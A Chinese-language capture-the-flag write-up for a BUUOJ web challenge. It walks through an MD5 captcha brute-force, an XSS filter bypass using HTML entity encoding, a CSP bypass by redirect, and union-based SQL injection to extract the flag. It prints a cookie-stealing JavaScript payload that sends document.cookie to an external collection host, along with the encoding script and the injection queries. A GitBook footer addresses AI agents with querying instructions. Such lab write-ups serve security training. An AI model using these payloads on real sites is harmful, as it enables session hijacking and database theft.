# \[CISCN2019 华东北赛区]Web2 ## \[CISCN2019 华东北赛区]Web2 ## 考点 * xss * sql注入 ## wp 登录注册,有个投稿和反馈的功能。 投稿输入 ```javascript ``` 得到文章页面,访问发现存在过滤 ```javascript ``` 反馈处有提示`请输入有问题的网址。我会亲自查看`,应该是个XSS,在投稿插入XSS语句,在反馈处让bot访问XSS页面窃取cookie 反馈处的验证要求验证码md5的前6位符合要求,爆破脚本如下 ```python import hashlib for i in range(1, 10000001): s = hashlib.md5(str(i).encode()).hexdigest()[0:6] if s == "0fc428": print(i) break ``` 接下来是如何绕过XSS的过滤。测试发现会把`英文的单双引号,英文的括号`换成`中文`的,然后`<,>svg,eval,script`都没过滤。可以尝试HTML实体编码绕过,`'`是`'`,`"`是`"`,`(`是`(`,`)`是`)`,=是`=` 如下payload可以弹窗 ``` ``` 编码脚本 ```python res = '' s="eval(atob('YWxlcnQoMSk='))" for i in s: res = res + '&#' +hex(ord(i))[1:] + ';' ``` 发现有CSP,可以使用跳转绕过 * `default-src 'self'` 所有的外部资源只能从当前域名加载 * `script-src unsafe-inline` 允许执行页面内嵌的标签和事件监听函数 * `script-src unsafe-eval` 允许将字符串当作代码执行,比如使用eval、setTimeout、setInterval和Function等函数 ![](https://982381760-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FKaFsBybpMwWG2gp4TiAi%2Fuploads%2FsTPow5CpS8a11ASWNDNf%2Fimage.png?alt=media\&token=61489e44-e63d-4f2d-b036-822ec9bb8b78) 到XSS平台新建个项目,然后访问script脚本,得到代码 ```javascript (function() { (new Image()).src = 'https://as.vip/bdstatic.com/?callback=jsonp&id=nRaT&location=' + encodeURIComponent((function() { try { return document.location.href } catch(e) { return '' } })()) + '&toplocation=' + encodeURIComponent((function() { try { return top.location.href } catch(e) { return '' } })()) + '&cookie=' + encodeURIComponent((function() { try { return document.cookie } catch(e) { return '' } })()) + '&opener=' + encodeURIComponent((function() { try { return (window.opener && window.opener.location.href) ? window.opener.location.href: '' } catch(e) { return '' } })()); })(); ``` 然后把(new Image()).src改成window\.location.href,结果如下 ```javascript (function() { window.location.href = 'https://as.vip/bdstatic.com/?callback=jsonp&id=nRaT&location=' + encodeURIComponent((function() { try { return document.location.href } catch(e) { return '' } })()) + '&toplocation=' + encodeURIComponent((function() { try { return top.location.href } catch(e) { return '' } })()) + '&cookie=' + encodeURIComponent((function() { try { return document.cookie } catch(e) { return '' } })()) + '&opener=' + encodeURIComponent((function() { try { return (window.opener && window.opener.location.href) ? window.opener.location.href: '' } catch(e) { return '' } })()); })(); ``` 用脚本生成一下payload,在XSS平台可以看到自己的cookie ```python s = '''(function(){window.location.href='https://as.vip/bdstatic.com/?callback=jsonp&id=nRaT&location='+encodeURIComponent((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+encodeURIComponent((function(){try{returntop.location.href}catch(e){return ''}})())+'&cookie='+encodeURIComponent((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+encodeURIComponent((function(){try{return (window.opener&&window.opener.location.href)?window.opener.location.href:''}catch(e){return''}})());})()''' output = "" for i in s: output += "&#" + hex(ord(i))[1:] + ";" print("") ``` 然后到反馈里面填链接如下 ``` http://web.node3.buuoj.cn:81/post/8933fc518918c6156409c3c2fe884a5f.html ``` ![](https://982381760-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FKaFsBybpMwWG2gp4TiAi%2Fuploads%2F2epcctiQwYJtoDL6zo6g%2Fimage.png?alt=media\&token=bb225291-6247-4ee6-9c43-9d14f6a3668d) 修改cookie再去访问admin.php,发现是个查询的功能 ![](https://982381760-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FKaFsBybpMwWG2gp4TiAi%2Fuploads%2F2TsL5Y8Izw1tKU2BEX1L%2Fimage.png?alt=media\&token=605be030-426b-454c-8fc7-39c8dc2f078e) 尝试SQL注入,输入`id=3-1`,得到`id=2`的结果,是数字型注入 然后尝试联合注入`id=-1 union select 1,2,3` 当前数据库`id=-1 union select 1,(select database()),3` 得到`ciscn` 查询所有数据库`id=-1 union select 1,(select group_concat(schema_name) from information_schema.schemata),3` 得到`information_schema,ctftraining,mysql,performance_schema,test,ciscn` 当前数据库的表`id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='ciscn'),3` 得到`flag,users` 查询flag表`id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_name='flag'),3` 得到`flagg` 查询flag `id=-1 union select 1,(select flagg from flag),3` 可以得到flag ![](https://982381760-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FKaFsBybpMwWG2gp4TiAi%2Fuploads%2FnUWD51LNImOhZcDEfcDC%2Fimage.png?alt=media\&token=fae3dc0f-1fef-4983-8f98-0f5765ad15eb) ## 小结 1. XSS绕过的方式可以用HTML实体转义,有两种方式`&#x十六进制;`和`&#十进制;` 2. CSP绕过可以尝试`window.location.href`跳转的方式 --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://peri0dctf.gitbook.io/buuojwp/xss/ciscn2019-hua-dong-bei-sai-qu-web2.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.